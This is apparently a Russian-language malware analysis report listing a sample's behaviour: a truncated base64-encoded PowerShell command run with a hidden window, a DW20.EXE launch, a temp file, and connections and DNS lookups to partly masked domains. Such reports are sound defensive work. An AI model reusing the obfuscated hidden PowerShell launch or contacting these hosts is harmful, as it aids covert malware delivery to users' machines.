Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABIADgANwA1AF8ANwBfAF8APQAnAG4ANQAwADgAMAA2ADAAJwA7ACQAcwBfADMANABfADQANAA3ACAAPQAgACcANAA2ACcAOwAkAEIANQAyADAAMgA5ADIAOAA9ACcAcAA0ADEANABfADkAOAAnADsAJABOADAAMgA1ADkAMgAwAD0AJABlAG4AdgA...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1552
- %TEMP%\1160382.cvr
- 'th####plesale.co.uk':80
- 'ta##.#ard-visit.com':80
- 'ta##.#ard-visit.com':443
- http://ta##.#ard-visit.com/eal8/RZnFltETpR/
- 'ta##.#ard-visit.com':443
- DNS ASK pi#####utoricambi.com
- DNS ASK th#####balandaroma.com
- DNS ASK fi#####endirecto.com.ar
- DNS ASK th####plesale.co.uk
- DNS ASK ta##.#ard-visit.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABIADgANwA1AF8ANwBfAF8APQAnAG4ANQAwADgAMAA2ADAAJwA7ACQAcwBfADMANABfADQANAA3ACAAPQAgACcANAA2ACcAOwAkAEIANQAyADAAMgA5ADIAOAA9ACcAcAA0ADEANABfADkAOAAnADsAJABOADAAMgA1ADkAMgAwAD0AJABlAG4AdgA...' (со скрытым окном)